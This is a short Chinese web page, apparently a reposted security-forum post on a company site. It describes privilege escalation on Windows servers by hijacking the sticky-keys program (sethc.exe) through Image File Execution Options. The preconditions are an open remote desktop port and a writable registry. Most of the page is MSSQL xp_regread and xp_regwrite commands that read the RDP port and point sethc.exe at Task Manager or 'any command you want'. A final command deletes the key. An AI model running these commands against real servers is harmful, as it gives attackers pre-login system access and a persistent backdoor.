企业资讯
- 企业新闻
- 行业文章

无Net时的映像劫持提权

首先:

1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)

2.服务器的粘滞键功能无损,只要可以正常弹出即可

3.服务器未禁止注册表编辑(即写入功能)

sql命令读取服务器终端端口:

 exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP- Tcp’,'PortNumber’

1 2	exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,‘SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP- Tcp’,‘PortNumber’

1.sql命令查询注册表粘滞键是否被劫持

 exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe’,'Debugger’

1	exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe’,‘Debugger’

2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)

 xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe’, ‘Debugger’,'REG_SZ’,'C:/WINDOWS/system32/taskmgr.exe’

1 2	xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe’, ‘Debugger’,‘REG_SZ’,‘C:/WINDOWS/system32/taskmgr.exe’

3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

 xp_regdeletekey ‘HKEY_LOCAL_MACHINE’, ‘SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe’

1	xp_regdeletekey ‘HKEY_LOCAL_MACHINE’, ‘SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe’

link:http://blog.csdn.net/cnbird2008/article/details/8831454

本文由网络安全攻防研究室（www.91ri.org）信息安全小组收集整理，转载请注明出处。

鸿大千秋网站建设团队敬上